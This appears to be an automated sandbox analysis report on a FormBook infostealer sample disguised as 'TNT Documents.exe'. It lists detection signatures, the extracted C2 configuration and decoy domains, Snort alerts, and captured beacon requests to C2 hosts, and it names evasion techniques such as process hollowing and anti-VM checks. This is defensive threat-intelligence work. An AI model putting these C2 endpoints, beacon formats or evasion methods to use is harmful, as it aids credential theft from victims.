Windows Analysis Report TNT Documents.exe

Overview

General Information

Sample Name: TNT Documents.exe
Analysis ID: 532859
MD5: f943d9ee79559042bfff9b4e55270cfa
SHA1: 7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256: 2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
Tags: exe, Formbook, TNT

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
Multi AV Scanner detection for submitted file
Source: TNT Documents.exe ReversingLabs: Detection: 46%
Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd Avira URL Cloud: Label: malware
Source: http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: TNT Documents.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.TNT Documents.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: TNT Documents.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: TNT Documents.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B103E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B10494
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_06B103D1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then pop edi 7_2_0040C3AE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 4x nop then pop edi 7_2_00415681
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 4x nop then pop edi 17_2_0331C3AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 4x nop then pop edi 17_2_03325681

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe Network Connect: 51.255.30.106 80
Source: C:\Windows\explorer.exe Network Connect: 119.18.54.99 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe Domain query: www.coached.info
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.floridanratraining.com/how6/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View ASN Name: OVHFR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.cortepuroiberico.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.specialtyplastics.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.metronixmedical.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.coached.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 209.17.116.163
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 02 Dec 2021 17:59:48 GMT Content-Type: text/html Content-Length: 275 ETag: "61a4f026-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.comx
Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designerss
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com=
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comF(
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comI.TTF
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comals
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comcomo?
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comitud
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.como
Source: TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comX
Source: TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.c
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnG
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cna
Source: TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnaX
Source: TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnar
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/.comp
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/slnt
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/soft
Source: TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.coma
Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.comus4
Source: TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comU
Source: TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comic
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de2
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.der
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn9
Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: unknown DNS traffic detected: queries for: www.cortepuroiberico.com
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.cortepuroiberico.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1 Host: www.specialtyplastics.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
